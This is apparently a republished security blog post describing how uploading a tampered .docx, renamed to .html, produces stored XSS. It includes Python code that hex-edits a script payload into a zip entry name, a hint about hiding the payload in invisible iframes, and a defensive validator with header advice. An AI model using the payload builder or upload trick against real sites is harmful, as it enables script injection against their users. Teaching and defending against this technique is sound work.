
How to understand how to upload Word files to form a storage XSS path

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Many people new to web testing are unsure how uploading a Word file can lead to stored XSS. This article walks through the cause of the problem and the fixes for it, and I hope it helps you deal with the same situation.

During penetration tests, an upload function on the target site always arouses my curiosity. With luck, if the server runs PHP or ASP and the upload does not filter file extensions, you can upload a webshell directly and gain control of the server. If that fails, I try uploading an HTML page that triggers client-side JavaScript of my own choosing, producing an XSS attack. Here I share an example of uploading .docx files to create a stored XSS vulnerability.

Test upload function

During a web test I found that the target site let an unprivileged user upload files, including .docx files, and that an uploaded .docx could then be downloaded again. Comparing the file I uploaded (uploaded.docx) with the copy I downloaded back (downloaded.docx) showed differences between the two: after a successful upload, and before the download is offered, the server does some processing on the uploaded file and serves the result of that processing.

The upload had to be a valid .docx file. Since the server seemed to process the file for display in the browser, perhaps converting it to HTML, I asked myself whether the suffix made any difference. So I first tried changing the .docx suffix to .html in the filename of the POST request:

When the file is uploaded as .html and later requested from the server, the server sets the Content-Type header to text/html based on the extension, so the browser parses and executes the file as HTML:

Insert XSS Payload

This gave me the idea of bundling an XSS payload into the .docx file itself, which is just a zip archive. After renaming .docx to .zip I needed to find regions of the archive that the server's processing would not alter, so that they would reach the browser unchanged. I found that some file paths (entry names) inside the docx zip stay exactly as they were. As the figure shows, I appended a long string of letters to the settings.xml entry name so I could locate it. I then renamed the .zip back to .docx, opened it in UltraEdit's hex view, and overwrote the bytes of that unchanged region with my JavaScript XSS code:

The server accepted the constructed .docx file without complaint. In the HTTP POST I changed the suffix to .html for the final upload. When the file is then requested from the server it is served as HTML and still contains the complete XSS payload inserted earlier, and once the browser parses it the payload executes successfully. To disguise the attack, an attacker can embed the file's URI in a hidden iframe on a page the victim visits, so the script runs without the victim noticing, as shown below:
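To make the zip-level trick concrete, here is an added example in Python that is not the article's own tooling: it builds a minimal .docx, reserves a slot in the settings entry name, and then performs the hex-editor overwrite programmatically. The payload string, the slot marker and the XML parts are constructed for the example. Which regions survive a particular server's processing is target specific; zip entry names are simply the region that worked in the article's case, and the example shows why they work: they are stored uncompressed and are not covered by any CRC.

```python
import io
import zipfile

# Constructed example payload; any JavaScript the target will serve back works.
PAYLOAD = b"<script>alert(document.domain)</script>"

# Stand-in for the "long string of letters" appended to the settings.xml entry
# name so it can be found in a hex editor. It must be at least as long as the
# payload, because the hex-edit step overwrites it in place.
SLOT = (b"PAYLOADSLOT" * 5)[:48]

# Minimal OOXML parts (constructed) so the archive is a plausible .docx.
CONTENT_TYPES = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    b'<Default Extension="xml" ContentType="application/xml"/>'
    b'<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    b'</Types>'
)
RELS = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    b'</Relationships>'
)
DOCUMENT = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>'
)
SETTINGS = b'<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>'


def build_clean_docx() -> bytes:
    """Step 1: a valid .docx whose settings entry carries an oversized name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", DOCUMENT)
        # Entry names are written uncompressed in both the local file header
        # and the central directory, so unlike the deflated part bodies they
        # reach the browser byte for byte.
        z.writestr("word/settings_" + SLOT.decode() + ".xml", SETTINGS)
    return buf.getvalue()


def hex_edit(raw: bytes, old: bytes, new: bytes) -> bytes:
    """Step 2: the hex-editor step. Overwrite every copy of the slot in place.
    Lengths must match: growing or shrinking the file shifts every offset the
    central directory points at and the archive stops opening."""
    if len(old) != len(new):
        raise ValueError("replacement must keep the byte length")
    return raw.replace(old, new)


def build_poisoned_docx(payload: bytes = PAYLOAD) -> bytes:
    """The file that is uploaded (with its suffix changed to .html in the POST)."""
    if len(payload) > len(SLOT):
        raise ValueError("payload longer than the reserved slot")
    return hex_edit(build_clean_docx(), SLOT, payload.ljust(len(SLOT), b" "))


def zip_is_intact(raw: bytes) -> bool:
    """Does the archive still open after the edit? Entry names are not covered
    by any CRC, so a same-length overwrite passes every member check
    (testzip returns None when all member CRCs match)."""
    try:
        with zipfile.ZipFile(io.BytesIO(raw)) as z:
            return z.testzip() is None
    except zipfile.BadZipFile:
        return False


def entry_names(raw: bytes) -> list:
    """Entry names as a zip reader (or the server's docx processing) sees them."""
    with zipfile.ZipFile(io.BytesIO(raw)) as z:
        return z.namelist()


def payload_in_plaintext(raw: bytes, payload: bytes = PAYLOAD) -> bool:
    """What a browser sees when these bytes come back as text/html: the payload
    appears verbatim amid the binary, and the tolerant HTML parser runs it."""
    return payload in raw


if __name__ == "__main__":
    poisoned = build_poisoned_docx()
    print("zip still opens:", zip_is_intact(poisoned))
    print("payload in plaintext:", payload_in_plaintext(poisoned))
    print("entries:", entry_names(poisoned))
```

The same-length constraint in hex_edit is the part that matters in practice: a longer payload has to be reserved up front as a longer slot, because the central directory records absolute offsets and any shift breaks the archive before the server ever gets to serve it.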

Protective measures

For developers, the impact should be limited with the following measures.

Validate on the server side, after the upload is received, that the file really is a valid .doc or .docx (check the container structure, not just the extension or the client-supplied Content-Type).

Set the Content-Type header strictly. A stored file must be served with the Content-Type determined when it was validated at upload time; changing the suffix in the request, or sending a different Content-Type with the upload, must not change how the file is served.

Control what happens when the file is downloaded: add the response header "Content-Disposition: attachment" so the file is downloaded rather than rendered inline in the browser.

Reject uploads whose raw bytes contain HTML tags, because a docx archive can be tampered with to carry HTML.
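The measures above, expressed as an added Python example that is not code from the article or from the site that was tested: a server-side validator that rejects both the renamed upload and the entry-name injection, and the response headers for serving a file that passed validation. The constant names, the sample archives, the regular expressions and the extra Content-Security-Policy header are assumptions of the example rather than anything the article specifies.

```python
import io
import os
import re
import zipfile

DOCX_MIME = "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
ALLOWED_EXT = {".docx": DOCX_MIME}   # add .doc with an OLE/CFB structure check if needed
REQUIRED_PARTS = {"[Content_Types].xml", "word/document.xml"}
# Characters a genuine OOXML entry name needs. Anything else (spaces, <, >,
# quotes, parentheses) is exactly where the article's payload ended up.
SAFE_ENTRY = re.compile(r"^[A-Za-z0-9_\-\[\]./]+$")
# Markup that has no business appearing as plaintext anywhere in the raw bytes.
HTML_MARK = re.compile(rb"<\s*/?\s*(script|iframe|html|svg|object|embed)\b", re.I)


def validate_docx(raw: bytes, client_filename: str):
    """Runs on the server after the upload is received. Returns (ok, reason).
    Nothing here trusts the request's Content-Type; the client suffix is used
    only to choose which validator applies, never to decide what the file is."""
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if not raw.startswith(b"PK\x03\x04"):
        return False, "not a zip container"
    try:
        with zipfile.ZipFile(io.BytesIO(raw)) as z:
            if z.testzip() is not None:
                return False, "corrupt member"
            names = set(z.namelist())
    except zipfile.BadZipFile:
        return False, "unreadable zip"
    for name in names:
        # Catches payloads smuggled into entry names, and path traversal.
        if not SAFE_ENTRY.match(name) or ".." in name or name.startswith("/"):
            return False, "suspicious entry name: %r" % name
    if not REQUIRED_PARTS <= names:
        return False, "missing required OOXML parts"
    # Plaintext HTML in a docx means stored (uncompressed) parts, comments or
    # names carry markup; deflated XML bodies never match this.
    if HTML_MARK.search(raw):
        return False, "HTML markup present in raw bytes"
    return True, "ok"


def download_headers(server_assigned_name: str, verified_mime: str) -> dict:
    """Headers for serving a stored upload. The type is the one recorded at
    validation time, never derived from the suffix in the requested URL, and
    the file is forced to download instead of being rendered inline."""
    return {
        "Content-Type": verified_mime,
        # Server-assigned name: a user-chosen filename here invites header injection.
        "Content-Disposition": 'attachment; filename="%s"' % server_assigned_name,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",   # belt and braces if a browser renders it anyway
    }


# Constructed samples (not the article's files).
def _zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in entries:
            z.writestr(name, data)
    return buf.getvalue()


GOOD_DOCX = _zip([("[Content_Types].xml", b"<Types/>"),
                  ("word/document.xml", b"<w:document/>"),
                  ("word/settings.xml", b"<w:settings/>")])
NAME_INJECTED = _zip([("[Content_Types].xml", b"<Types/>"),
                      ("word/document.xml", b"<w:document/>"),
                      ("word/settings_<script>alert(1)</script>.xml", b"<w:settings/>")])
PLAIN_HTML = b"<html><body><script>alert(1)</script></body></html>"

if __name__ == "__main__":
    for label, blob, fname in [("good", GOOD_DOCX, "report.docx"),
                               ("renamed", GOOD_DOCX, "report.html"),
                               ("injected", NAME_INJECTED, "report.docx"),
                               ("html", PLAIN_HTML, "report.docx")]:
        print(label, validate_docx(blob, fname))
    print(download_headers("f3a9c2.docx", DOCX_MIME))
```

Of the four checks, the headers are the one that would have stopped the article's attack on its own: once the stored file is served with the validated type, Content-Disposition: attachment and nosniff, renaming the upload to .html changes nothing. The raw-byte HTML scan is a heuristic and should be treated as defence in depth, not as the control that decides whether the file is safe.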
